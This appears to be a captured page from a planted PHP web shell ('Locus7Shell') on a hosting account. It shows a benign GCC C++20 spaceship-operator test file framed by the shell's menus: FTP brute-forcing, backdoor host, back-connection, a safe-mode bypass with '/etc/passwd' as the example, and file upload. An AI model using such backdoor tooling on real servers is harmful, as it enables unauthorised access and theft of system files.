Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/g++.dg/cpp2a/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     spaceship-synth10.C (1.17 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// { dg-do run { target c++20 } }
// { dg-options "" }

#include <compare>

struct C {
  int y;
  int x[4];
  auto operator<=>(C const&) const = default;
};

struct D {
  int y;
  int x[1];
  auto operator<=>(D const&) const = default;
};

struct E {
  int y;
  int x[0];
  auto operator<=>(E const&) const = default;
};

int
main ()
{
  constexpr C c1 = { 1, { 2, 3, 4, 5 } };
  constexpr C c2 = { 1, { 2, 3, 5, 4 } };
  constexpr C c3 = { 1, { 2, 2, 6, 7 } };
  static_assert (c1 < c2);
  static_assert (c3 < c1);
  constexpr D d1 = { 1, { 2 } };
  constexpr D d2 = { 1, { 3 } };
  constexpr D d3 = { 1, { 1 } };
  static_assert (d1 < d2);
  static_assert (d3 < d1);
  constexpr E e1 = { 1, {} };
  constexpr E e2 = { 2, {} };
  constexpr E e3 = { 1, {} };
  static_assert (e1 < e2);
  static_assert (e1 == e3);
  C c4 = { 1, { 2, 3, 4, 5 } };
  C c5 = { 1, { 2, 3, 5, 4 } };
  C c6 = { 1, { 2, 2, 6, 7 } };
  if (c4 >= c5 || c6 >= c4)
    __builtin_abort ();
  D d4 = { 1, { 2 } };
  D d5 = { 1, { 3 } };
  D d6 = { 1, { 1 } };
  if (d4 >= d5 || d6 >= d4)
    __builtin_abort ();
  E e4 = { 1, {} };
  E e5 = { 2, {} };
  E e6 = { 1, {} };
  if (e4 >= e5 || e4 != e6)
    __builtin_abort ();
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0059 ]--